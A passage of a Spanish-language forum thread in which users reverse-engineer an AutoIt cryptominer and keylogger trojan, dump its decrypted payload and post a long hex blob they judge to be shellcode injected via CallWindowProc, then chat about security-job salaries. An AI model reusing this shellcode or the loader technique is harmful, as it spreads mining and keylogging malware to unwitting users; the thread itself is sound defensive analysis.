Hardware y software

Troyano minador

lupin3rd
lupin3rd #151 Sep '18

@AikonCWD ME ACABA DE DAR UN JAMACUCO. Mi hermana utiliza estas mierdipaginas y me ha dicho que precisamente esta la usa. Estoy SEGURO que la ha usado en mi PC tambien pero le tengo puesta una cuenta limitada. Windows 10. ¿Probabilidad de que me haya infectado?


https://imgur.com/ivZ8OIP

Aqui pantallazo de mi unidad C:, que creo que es donde ves si se te ha detonado.

1 respuesta
Alu
Alu #152 Sep '18

#105 Puedes hacer un copy paste aquí del Preview?

1 respuesta
AikonCWD
AikonCWD #153 Sep '18 Git Gud

#149 Otra cosa que puedes probar es volcar la variable $czetttzodcpauavqidfmmevwlg justo antes d ela llamada al DllCall, descomenta las líneas de abajo y no omitas la función StringToBinary que hay en el script original del bicho.

#152 Puedes explorarlo tu mismo, el resultado de la detonación lo he publicado: https://app.any.run/tasks/5339bb4c-b099-444e-8753-0e36781adb24

Abajo verás las llamadas HTTP y podrás explorar ese paquete entero.

#151 No veo nada raro... mira el programador de tareas a ver si tienes algún proceso chupando más del 50% de CPU.

1 1 respuesta
bLaKnI
bLaKnI #154 Sep '18 Inocente

#153 JUSTO, acabo de hacerlo.
Y flipa:

Esto es el resultado de:

$inbvknuudjprrttscifuhgwxcpw = StringToBinary(nloccoxlxa(FileRead($parch), "hZRRMqNcph"))

El msgbox de esta variable.

1 respuesta
AikonCWD
AikonCWD #155 Sep '18 Git Gud

#154 Eso es HEX, haz una conversión a ver que sale xD Deberías terminar con un código enorme que empieze por las letras MZ (cabecera de un PE32, que es lo que buscamos)

1 respuesta
bLaKnI
bLaKnI #156 Sep '18 Inocente

#155 Nop:

Resultado:

1 respuesta
AikonCWD
AikonCWD #157 Sep '18 Git Gud

#156 de esa foto, descomenta las líneas 22 y 23 y pon tu código de dumpeo/volcado después de la línea 23, la 24 DllCall déjala comentada.

edit: no tengo ni puta idea, solo son pruebas xd

1 respuesta
bLaKnI
bLaKnI #158 Sep '18 Inocente

#157 Hecho.

El bloque de la variable $inbv... es el mismo. Ese que parece HEX.
Y si dumpeo la $czet... que parece mas una struct de variable, nada. Sale vacio.

La clave esta en ese bloque que aparece que parece HEX.

1 respuesta
AikonCWD
AikonCWD #159 Sep '18 Git Gud

#158 Pues ya ni idea :(

1 respuesta
bLaKnI
bLaKnI #160 Sep '18 Inocente

#159

---------------------------
Volcado SHELL.TXT
---------------------------
0x518FE854BCED04040485C000F4FBFB544C71F28F41F887C0E089810D77F5FB8991E46BF5FBC20651C246058FC24606E8C2460787C24600C0C24601B4C2460257C2460352C2460C53C2460D8DC2460E59C2460FF8C2460860C246098FC2460A01C2460B34C2461404C2461504C2461604C246178FC2461044C2461108C246128FC2461344C2461C08C2461D8FC2461E04C2461F8FC2461804C246198FC2461A44C2461B1CC246248DC2462541C24626FCC246278FC2462079C24621FCC2462262C2462385C2462C3BC2462D49C2462E5EC2462F0BC2462881C24629B4C2462A04C2462B04C2463404C246358FC2463641C24637FCC2463037C24631D6C2463256C2463354C2463C8FC2463D43C2463E38C2463F9DC2463807C2463900C2463A20C2463B17C2464450C2464520C2464600C2464787C24640C0C246410CC246428DC2464341C2464CD8C2464D8FC2464E41C2464FD8C2464885C246493CC2464A54C2464B41C2465404C2465504C246560BC2465781C246508DC2465104C2465204C2465304C2465C8FC2465D41C2465ED8C2465F8FC246584CC246597CC2465A07C2465B49C24664FCC246658FC246665DC246671CC2466081C24661DFC2466278C246637DC2466C47C2466D37C2466EF2C2466F8FC2466841C24669FCC2466A37C2466BD6C2467456C2467554C246768FC2467745C2467024C2467137C24672D6C2467356C2467C54C2467D8FC2467EC2C2467FC5C24678E4C2467906C2467A9DC2467B07C2868404040400C2868504040420C2868604040417C2868704040450C2868004040420C2868104040400C2868204040487C28683040404C0C2868C0404040CC2868D04040407C2868E04040400C2868F04040420C2868804040417C2868904040450C2868A04040420C2868B04040400C2869404040487C28695040404C0C286960404040CC286970404048FC2869004040404C2869104040407C2869204040441C28693040404FCC2869C04040485C2869D0404043CC2869E04040443C2869F04040461C2869804040470C2869904040454C2869A04040471C2869B04040439C286A404040487C286A5040404C4C286A604040400C286A704040485C286A00404043CC286A104040476C286A20404046BC286A304040467C286AC04040445C286AD04040471C286AE04040436C286AF0404048FC286A804040445C286A904040420C286AA04040407C286AB04040441C286B4040404FCC286B504040437C286B6040404D6C286B704040456C286B004040454C286B10404048FC286B2040404C2C286B304040407C286BC040404C4C286BD0404049DC286BE04040407C286BF04040400C286B804040420C286B904040417C286BA04040450C286BB04040420C286C404040400C286C504040487C286C6040404C0C286C70404040CC286C004040462C286C10404048FC286C204040404C286C30404048FC286CC04040455C286CD04040418C286CE04040407C286CF04040451C286C8040404FCC286C90404040BC286CA040404B3C286CB040404C4C286D4040404C5C286D5040404E4C286D604040406C286D704040407C286D0040404D4C286D10404048FC286D204040406C286D304040407C286DC04040441C286DD040404FCC286DE0404048DC286DF04040441C286D8040404C8C286D904040442C286DA0404044FC286DB04040471C286E40404048EC286E5040404C2C286E604040441C286E7040404B6C286E004040448C286E1040404C2C286E204040441C286E3040404B7C286EC0404046BC286ED040404C2C286EE04040441C286EF040404B0C286E804040465C286E9040404C2C286EA04040441C286EB040404B1C286F404040460C286F5040404C2C286F604040441C286F7040404B2C286F004040448C286F1040404C2C286F204040441C286F3040404B3C286FC0404046DC286FD040404C2C286FE04040441C286FF040404BCC286F804040466C286F9040404C2C286FA04040441C286FB040404BDC2860405040476C28605050404C2C2860605040441C28607050404BEC2860005040465C28601050404C2C2860205040441C28603050404BFC2860C05040476C2860D050404C2C2860E05040441C2860F050404B8C286080504047DC28609050404C2C2860A05040441C2860B050404B9C2861405040445C28615050404C2C2861605040441C28617050404BAC2861005040404C28611050404C2C2861205040441C28613050404BBC2861C05040452C2861D050404C2C2861E05040441C2861F050404C4C286180504046DC28619050404C2C2861A05040441C2861B050404C5C2862405040476C28625050404C2C2862605040441C28627050404C6C2862005040470C28621050404C2C2862205040441C28623050404C7C2862C05040471C2862D050404C2C2862E05040441C2862F050404C0C2862805040465C28629050404C2C2862A05040441C2862B050404C1C2863405040468C28635050404C2C2863605040441C28637050404C2C2863005040445C28631050404C2C2863205040441C28633050404C3C2863C05040468C2863D050404C2C2863E05040441C2863F050404CCC2863805040468C28639050404C2C2863A05040441C2863B050404CDC286440504046BC28645050404C2C2864605040441C28647050404CEC2864005040467C28641050404C2C2864205040441C28643050404CFC2864C05040404C2864D05040489C2864E05040441C2864F050404B6C2864805040454C286490504048FC2864A05040441C2864B050404FCC2865405040454C28655050404FBC2865605040451C28657050404C8C286500504048DC2865105040441C28652050404D4C2865305040489C2865C05040441C2865D050404BBC2865E05040454C2865F0504048FC2865805040441C28659050404FCC2865A05040454C2865B050404FBC2866405040451C28665050404C8C286660504048FC28667050404DCC286600504048FC2866105040479C28662050404F8C286630504048FC2866C05040441C2866D050404F8C2866E05040437C2866F050404D6C2866805040456C2866905040454C2866A0504048FC2866B05040443C2867405040438C286750504049DC2867605040407C2867705040400C2867005040420C2867105040417C2867205040450C2867305040420C2867C05040400C2867D05040487C2867E050404C0C2867F0504040CC286780504048DC2867905040441C2867A050404D8C2867B0504046EC2868405040444C286850504046CC2868605040404C2868705040414C2868005040404C2868105040404C286820504046CC2868305040444C2868C05040446C2868D0504040BC2868E05040404C2868F0504046EC2868805040404C28689050404FBC2868A050404D7C2868B0504048DC2869405040441C28695050404E0C286960504048FC2869705040441C28690050404D8C286910504040BC28692050404B3C286930504045CC2869C05040402C2869D0504044FC2869E05040481C2869F050404DFC2869805040478C2869905040468C2869A05040447C2869B05040437C286A4050404F2C286A50504048FC286A605040449C286A7050404F8C286A00504048FC286A1050404C5C286A205040437C286A3050404D6C286AC05040456C286AD05040454C286AE0504048FC286AF05040443C286A805040438C286A90504049DC286AA05040407C286AB05040400C286B405040420C286B505040417C286B605040450C286B705040420C286B005040400C286B105040487C286B2050404C0C286B30504040CC286BC05040401C286BD050404FCC286BE05040404C286BF05040404C286B805040404C286B905040487C286BA050404D6C286BB05040404C286C405040456C286C505040454C286C60504048FC286C7050404C2C286C0050404C5C286C1050404E4C286C205040407C286C305040489C286CC05040400C286CD05040484C286CE0504049DC286CF05040407C286C805040400C286C905040420C286CA05040417C286CB05040450C286D405040420C286D505040400C286D605040487C286D7050404C0C286D00504040CC286D105040487C286D20504047CC286D305040414C286DC05040404C286DD05040472C286DE0504042FC286DF0504048FC286D805040454C286D905040408C286DA05040407C286DB05040451C286E4050404E0C286E50504048DC286E605040451C286E7050404F0C286E00504048FC286E105040454C286E205040410C286E305040407C286EC050404D5C286ED0504048DC286EE05040451C286EF050404F4C286E80504048FC286E905040444C286EA05040414C286EB0504048DC286F405040441C286F5050404E8C286F605040455C286F705040452C286F005040453C286F10504048FC286F205040479C286F3050404F0C286FC0504048FC286FD05040471C286FE050404F4C286FF0504048FC286F805040449C286F9050404E8C286FA050404C5C286FB050404EDC2860406040406C28605060404F7C28606060404A1C286070604045BC286000604045AC286010604045DC2860206040442C286030604044FC2860C06040471C2860D06040493C2860E0604048FC2860F06040441C28608060404D8C286090604048FC2860A06040484C2860B06040484C2861406040404C2861506040404C2861606040404C286170604048DC2861006040441C28611060404F4C286120604048FC2861306040441C2861C060404E0C2861D0604048DC2861E06040441C2861F060404F0C286180604048FC2861906040441C2861A060404F0C2861B06040407C2862406040441C28625060404F4C286260604048DC2862706040441C28620060404ECC28621060404EFC286220604046AC2862306040407C2862C06040441C2862D060404E0C2862E06040454C2862F060404FBC2862806040451C28629060404D4C2862A0604048DC2862B06040441C28634060404DCC2863506040487C2863606040479C28637060404DCC28630060404FBC2863106040470C286320604045EC286330604048FC2863C06040441C2863D060404ECC2863E0604048FC2863F06040404C2863806040481C28639060404C4C2863A06040470C2863B06040403C286440604048FC28645060404DCC2864606040407C2864706040459C28640060404E0C28641060404EFC286420604040DC286430604048FC2864C06040441C2864D060404ECC2864E0604048FC2864F0604045CC2864806040414C2864906040407C2864A06040459C2864B060404E0C286540604048FC2865506040441C28656060404ECC286570604048FC286500604047CC2865106040414C2865206040407C2865306040479C2865C060404E0C2865D060404EFC2865E06040434C2865F060404F3C28658060404C2C2865906040404C2865A06040404C2865B06040404C2866406040484C2866506040470C2866606040416C2866706040485C28660060404E2C28661060404FBC28662060404FBC2866306040404C2866C06040404C2866D06040452C2866E0604048FC2866F06040441C28668060404DCC2866906040454C2866A060404FBC2866B06040451C28674060404C8C286750604048DC2867606040403C28677060404EFC2867006040414C2867106040407C2867206040471C28673060404E0C2867C06040487C2867D060404C2C2867E06040406C2867F06040452C286780604048FC2867906040441C2867A060404DCC2867B06040454C28684060404FBC2868506040451C28686060404C8C286870604048DC2868006040403C2868106040487C28682060404C7C2868306040400C2868C06040487C2868D060404C3C2868E06040400C2868F0604048FC2868806040437C2868906040481C2868A060404F2C2868B06040471C28694060404CEC2869506040487C2869606040441C28697060404ECC2869006040410C286910604048FC2869206040441C28693060404ECC2869C0604048FC2869D06040444C2869E06040408C2869F06040481C28698060404C4C2869906040471C2869A0604048CC2869B0604048FC286A406040441C286A5060404D8C286A60604048FC286A706040484C286A0060404A4C286A106040404C286A206040404C286A306040404C286AC06040407C286AD06040441C286AE060404E0C286AF0604048DC286A806040441C286A9060404D0C286AA0604048FC286AB06040451C286B4060404D0C286B5060404EFC286B60604044CC286B70604048FC286B00604044EC286B106040400C286B206040487C286B3060404EDC286BC0604040CC286BD060404D5C286BE060404EDC286BF06040487C286B8060404C4C286B90604040CC286BA0604048FC286BB060404DDC286C40604044FC286C506040481C286C6060404DFC286C706040478C286C00604042BC286C106040447C286C20604040BC286C3060404B3C286CC0604040CC286CD060404C5C286CE060404EDC286CF06040408C286C806040487C286C9060404FDC286CA06040407C286CB06040471C286D406040419C286D50604048FC286D606040449C286D7060404D8C286D00604048FC286D106040471C286D2060404E0C286D30604042FC286DC06040475C286DD06040430C286DE0604048FC286DF0604040EC286D806040407C286D906040449C286DA060404E0C286DB06040462C286E40604048FC286E50604043CC286E606040462C286E706040485C286E0060404E3C286E1060404FBC286E20604040BC286E30604040BC286EC060404B3C286ED060404FBC286EE06040407C286EF060404CBC286E806040405C286E906040435C286EA06040487C286EB060404C4C286F406040406C286F50604044FC286F606040471C286F7060404D6C286F00604048FC286F106040446C286F206040400C286F306040407C286FC060404C6C286FD0604048FC286FE060404D4C286FF0604048FC286F8060404C6C286F90604048FC286FA060404CCC286FB0604042FC2860407040449C28605070404D0C286060704048FC2860707040459C28600070404D8C286010704043FC286020704048FC28603070404A0C2860C07040404C2860D07040404C2860E07040404C2860F07040476C28608070404A2C286090704048FC2860A07040441C2860B070404D8C286140704048FC2861507040444C286160704042CC286170704048DC2861007040441C28611070404E4C286120704048FC2861307040441C2861C070404E0C2861D07040407C2861E07040441C2861F070404E4C286180704048FC2861907040451C2861A070404F8C2861B070404FBC28624070404E4C286250704045BC286260704045AC286270704045FC286200704048FC28621070404E1C2862207040459C28623070404C7C2862C07040444C20449C244055EC2440654C2440704C2440006C2440104C2440204C2440304C2440C00C2440D04C2440E0BC2440F04C24408FBC24409FBC2440A04C2440B04C24414BCC2441504C2441604C2441704C2441004C2441104C2441204C2441304C2441C44C2441D04C2441E1EC2441F04C2441804C2441904C2441A04C2441B04C2442404C2442504C2442604C2442704C2442004C2442104C2442204C2442304C2442C04C2442D04C2442E04C2442F04C2442804C2442904C2442A04C2442B04C2443404C2443504C2443604C2443704C2443004C2443104C2443204C2443304C2443C04C2443D04C2443E04C2443F04C2443804C2443905C2443A04C2443B04C24444BEC2444514C2444604C244470AC244401BC24441B0C244420DC24443C9C2444C25C2444DBCC2444E05C2444F48C24448C9C2444925C2444A94C2444B94C2445450C244556CC244566DC2445777C2445024C2445174C2445276C244536BC2445C63C2445D76C2445E65C2445F69C2445824C2445969C2445A71C2445B77C2446470C2446524C2446666C2446761C2446024C2446176C2446271C244636AC2446C24C2446D71C2446E6AC2446F60C2446861C2446976C2446A24C2446B53C244746DC244756AC2447637C2447736C2447009C244710EC2447220C2447333C2447C04C2447D04C2447E04C2447F04C2447804C2447904C2447A04C2447B04C2848404040404C2848504040404C2848604040404C2848704040404C2848004040404C2848104040404C2848204040404C2848304040404C2848C04040404C2848D04040404C2848E04040404C2848F04040404C2848804040404C2848904040404C2848A04040404C2848B04040404C2849404040404C2849504040404C2849604040404C2849704040404C2849004040404C2849104040404C2849204040404C2849304040404C2849C04040404C2849D04040404C2849E04040404C2849F04040404C2849804040404C2849904040404C2849A04040404C2849B04040404C284A404040404C284A504040404C284A604040404C284A704040404C284A004040404C284A104040404C284A204040404C284A304040404C284AC04040404C284AD04040404C284AE04040404C284AF04040404C284A804040404C284A904040404C284AA04040404C284AB04040404C284B404040404C284B504040404C284B604040404C284B704040404C284B004040404C284B104040404C284B204040404C284B304040404C284BC04040404C284BD04040404C284BE04040404C284BF04040404C284B804040404C284B904040404C284BA04040404C284BB04040404C284C404040404C284C504040404C284C604040404C284C704040404C284C004040404C284C104040404C284C204040404C284C304040404C284CC04040404C284CD04040404C284CE04040404C284CF04040404C284C804040404C284C904040404C284CA04040404C284CB04040404C284D404040404C284D504040404C284D604040404C284D704040404C284D004040404C284D104040404C284D204040404C284D304040404C284DC04040404C284DD04040404C284DE04040404C284DF04040404C284D804040404C284D904040404C284DA04040404C284DB04040404C284E404040404C284E504040404C284E604040404C284E704040404C284E004040404C284E104040404C284E204040404C284E304040404C284EC04040404C284ED04040404C284EE04040404C284EF04040404C284E804040404C284E904040404C284EA04040404C284EB04040404C284F404040404C284F504040404C284F604040404C284F704040404C284F004040404C284F104040404C284F204040404C284F304040404C284FC04040404C284FD04040404C284FE04040404C284FF04040404C284F804040404C284F904040404C284FA04040404C284FB04040404C2840405040454C2840505040441C2840605040404C2840705040404C2840005040448C2840105040405C284020504040CC2840305040404C2840C0504041DC2840D0504045AC2840E05040446C2840F0504042EC2840805040404C2840905040404C2840A05040404C2840B05040404C2841405040404C2841505040404C2841605040404C2841705040404C28410050404E4C2841105040404C284120504048AC2841305040485C2841C0504040FC2841D05040405C2841E05040406C2841F0504041DC2841805040404C2841905040440C2841A05040404C2841B05040404C2842405040404C284250504040AC2842605040404C2842705040404C2842005040404C2842105040404C2842205040404C2842305040404C2842C050404A0C2842D05040454C2842E05040404C2842F05040404C2842805040404C2842905040414C2842A05040404C2842B05040404C2843405040404C2843505040464C2843605040404C2843705040404C2843005040404C2843105040404C2843205040444C2843305040404C2843C05040404C2843D05040414C2843E05040404C2843F05040404C2843805040404C2843905040406C2843A05040404C2843B05040404C2844405040400C2844505040404C2844605040404C2844705040404C2844005040404C2844105040404C2844205040404C2844305040404C2844C05040400C2844D05040404C2844E05040404C2844F05040404C2844805040404C2844905040404C2844A05040404C2844B05040404C2845405040404C28455050404D4C2845605040404C2845705040404C2845005040404C2845105040400C2845205040404C2845305040404C2845C05040404C2845D05040404C2845E05040404C2845F05040404C2845805040406C2845905040404C2845A05040404C2845B05040404C2846405040404C2846505040404C2846605040414C2846705040404C2846005040404C2846105040444C2846205040404C2846305040404C2846C05040404C2846D05040404C2846E05040414C2846F05040404C2846805040404C2846905040414C2846A05040404C2846B05040404C2847405040404C2847505040404C2847605040404C2847705040404C2847005040414C2847105040404C2847205040404C2847305040404C2847C05040404C2847D05040404C2847E05040404C2847F05040404C2847805040404C2847905040404C2847A05040404C2847B05040404C2848405040404C2848505040484C2848605040404C2848705040404C28480050404F6C2848105040407C2848205040404C2848305040404C2848C05040404C2848D050404C4C2848E05040404C2848F05040404C2848805040404C2848905040406C2848A05040404C2848B05040404C2849405040404C2849505040404C2849605040404C2849705040404C2849005040404C2849105040404C2849205040404C2849305040404C2849C05040404C2849D05040404C2849E05040404C2849F05040404C2849805040404C2849905040404C2849A05040404C2849B05040404C284A405040404C284A5050404B4C284A605040404C284A705040404C284A005040460C284A105040407C284A205040404C284A305040404C284AC05040404C284AD05040404C284AE05040404C284AF05040404C284A805040404C284A905040404C284AA05040404C284AB05040404C284B405040404C284B505040404C284B605040404C284B705040404C284B005040404C284B105040404C284B205040404C284B305040404C284BC05040404C284BD05040404C284BE05040404C284BF05040404C284B805040404C284B905040404C284BA05040404C284BB05040404C284C405040404C284C5050404A4C284C605040404C284C705040404C284C00504041CC284C105040404C284C205040404C284C305040404C284CC05040404C284CD05040404C284CE05040404C284CF05040404C284C805040404C284C905040404C284CA05040404C284CB05040404C284D405040404C284D5050404
---------------------------
Aceptar   

---------------------------
3 respuestas
Troyer
Troyer #161 Sep '18 Cofarde

#160 es la media de la polla mvdera en hex.

3
bLaKnI
bLaKnI #162 Sep '18 Inocente

Piro a comer que me matan! xD

1 respuesta
AikonCWD
AikonCWD #163 Sep '18 Git Gud

#160 Ni idea, ese bloque no tiene puto sentido... solo s eme ocurre que eso sea una shellcode y ésta pueda ser inyectada y ejecutada en la llamada a user32.dll;CallWindowProc. Pero es algo que no controlo... el proceso de dumpeo creo que lo estás haciendo bien.

sr_morao
sr_morao #164 Sep '18

Perdonar que de esto no tengo ni zorra pero yo en chrome tengo instalado el app "no coin"que bloquea que las paginas usen mi pc para mineria es mas en la pagina del op es entrar y esta app bloquearme el minado,antes la cpu se ponia al 100% al entrar ahora con esa app va tan normal

1 respuesta
LucianESP
LucianESP #165 Sep '18

Fan del hilo y de la gente que pilota tanto ayudando a la peña, mis dieses. ¿Al final qué tipo de Malware es el bichejo que se puede quitar a mano en #46? Debo de estudiar más seguridad informática >.< xD

1 respuesta
AikonCWD
AikonCWD #166 Sep '18 Git Gud

#165 Hoy en día es difícil de utilizar las nomenclaturas típicas (CARO) para clasificar el malware: https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/malware-naming

El tema es que la mayoría de malware actual es la unión o fusión de diferentes malwares, así que es imposible poner un solo nombre, pero lo voy a intentar: Minner:Win32/VBAgent.A!dr

Ese sería el nombre más indicado, salvando que no conozco si hay otras variantes. El tema es que de ese fichero aparece un autoIt, y de ese fichero aparece un minero y un keylogger. Así que tendríamos que sacar 3 nombres para cada fichero. Me sorprende que haya gente interesada en el naming y el sistema CARO para clasificar el malware, pero ahí lo llevas xD

3
Alahel
Alahel #167 Sep '18

Aikon, no te molaría trabajar en la Ciberseguridad? xD. Se cobra más que de Sysadmin... pero de largo. Aunque quizás con el nivel de Sysadmin que tienes no te compensa xD.

1 respuesta
AikonCWD
AikonCWD #168 Sep '18 Git Gud

#167 ciberseguridad en españa? No está nada valorado, es difícil encontrar curro por aquí de eso. El poco que hay está solicitado y cubierto.

1 2 respuestas
AikonCWD
AikonCWD #169 Sep '18 Git Gud

#162 He estado leyendo algo más... la string enorme en hex que has posteado está completa? Definitivamente es una shellcode, debería poder cargarla en IDA y reversar la shellcode. Nunca lo he hecho, voy a ver si me sale xD

https://forums.juniper.net/t5/Security/A-Walk-Through-AutoIT-Malware/ba-p/299843
info: http://akovid.blogspot.com/2014/04/shellcode-analysis.html

1 respuesta
kAmii
kAmii #170 Sep '18

#49 Creo que es porque el href que tiene esa pagina web (El hipervinculo en azul que cuando le das se abre) No lleva a ninguna parte.

ke2g
ke2g #171 Sep '18 :psyduck:

Buen curro, congratz Aikon!

pregunta, no relacionada con el tema pero como lo has comentado en #95 aprovecho. ¿Qué utilizas para hacer backup (o distribuir) del fichero de Keepass?

Vandalus
Vandalus #172 Sep '18 :psyduck:

Aikon putoamo de verdad, pon estas cosas en un canal de YouTube y te sacas una pasta, que seguro que hasta te viene bien para el bebe (los pañales valen una pasta xD). :stuck_out_tongue_winking_eye:

Alahel
Alahel #173 Sep '18

#168 Nada valorado? será en Barcelona, porque en Madrid el nivel 1 de mierda esta casi en 20K que ni en redes ni en sistemas te los van dar xD. Ya nivel 2 esta en torno los 24-28 y depende de las herramientas como puede ser Qradar o Arcsight que lleves te plantas en 35K sin ser un gurú.

Es cierto que en redes y sistemas si tienes bastante idea puedes colocarte bien...

1 respuesta
B
[Borrado] #174 Sep '18

#173 Poco me parece para el interés que demuestra el chico, sinceramente.

ke2g
ke2g #175 Sep '18 :psyduck:

#168 curro en seguridad y te aseguro que hay MUCHO curro, al menos en Madrid y Barcelona. Y esta bien pagado, con un poco de experiencia (3 años) te plantas fácil en 40-50k. Si quieres mas info MP. Eso si, ingles es requisito indispensable.

1 respuesta
bLaKnI
bLaKnI #176 Sep '18 Inocente

#175 Es mas fácil rondar los 50k como sysadmin, precisamente. Mucho antes que en CS.

#169 En teoria si, a no ser que el MsgBox tenga un limite de bytes. No lo he probado.
Esta todo en el curro. Ahora estoy en casa, aunque me es facil replicar el invento. Me gustaria ver si puedo escupirlo en un fichero. Realmente no tiene mucho misterio esto.

He buscado la shellcode directamente, incluso su signature. Pero no encuentro nada al respecto.
Y dudo de que se trate de un codigo propietario. Así que deberia encontrarse porai el codigo base en el que se sustenta...

Creo que los tiros van por aquí. Que te parece?

http://blog.sevagas.com/?PE-injection-explained

EDIT:

que tal esta shell?

Windows - Keylogger to File (./log.bin) + Null-Free Shellcode
https://www.exploit-db.com/exploits/39731/

EDIT 2:

madre mia...

https://www.exploit-db.com/docs/english/13231-practical-windows-and-linux-shellcode-design.pdf

jojojojo...

3 respuestas
HeXaN
HeXaN #177 Sep '18
#176bLaKnI:

Es mas fácil rondar los 50k como sysadmin, precisamente. Mucho antes que en CS.

Ni de coña. Ahora mismo seguridad y ciencia de datos es donde más rápidos subes y con diferencia. Sin contar historias de MBA y leches de esas.

2 respuestas
B
[Borrado] #178 Sep '18

#164 esa extensión es muy buena para las webs que minan online... Pero como te infecten el pc con mierda que minea... Mal asunto.

B
[Borrado] #179 Sep '18

Me recuerda a mis tiempos capturando tráfico en dedicados con tráfico sospechoso para terminar en un chat de un servidor irc con un bot que estaba controlando el dedicado.

bLaKnI
bLaKnI #180 Sep '18 Inocente

#177 Big data, ok. Y aún así, ni lo entiendo... Porque si con BI tampoco era nada del otro mundo, ahora resulta que va y el Big Data si la pega... Me parece sobrevalorado.
A mi, el tio que toque big data + ML y la toque de verdad, controle algo tipo TensorFlow, etc... Pues me vale como perfil potente. LA combinación de ambos mundos, vamos.
La mayoria de los MLearners, se dedican a los putos chatbots. KK de la vaca. Y los Big Data puros, entronos pre-estructurados y a correr... "Queriers". Les das datos crudos de cualquier cosa, y no saben ni por donde empezar. EL que toca HIVE como dios manda por ejemplo, a lo "evolución" de un DBA de la vieja escuela, podemos considerarlo como perfil potente también...

Seguridad, sigue siendo infinitamente difícil.
Soy CTO (aunque mi dia a dia es como sysadmin, mayormente) en el sector de las finanzas, y me cuesta horrores encontrar profesionales que DE VERDAD, sepan de CS.
Quizás se sube rapido, pero si eres bueno. Y me he encontrad mucho "voy de bueno" y luego ni putisima idea...
La mayoria además, apadrinados por brands del sector como Forti o F5... muy limitados. Los buenos, desaparecen al poco tiempo. Y se les pierde el rastro... ¿Por que será? :\

En mente tengo reclutar a un putísimo equipo de gente épica que he ido encontrando a lo largo de los años, para montar una especie de Avengers Team... xD
A mas de uno ya le he dicho que cuando me lance al turrón, le llamo y le pregunto que cobra, para ofrecerle 10k brutos mas al año y que se venga conmigo...

Usuarios habituales

Tags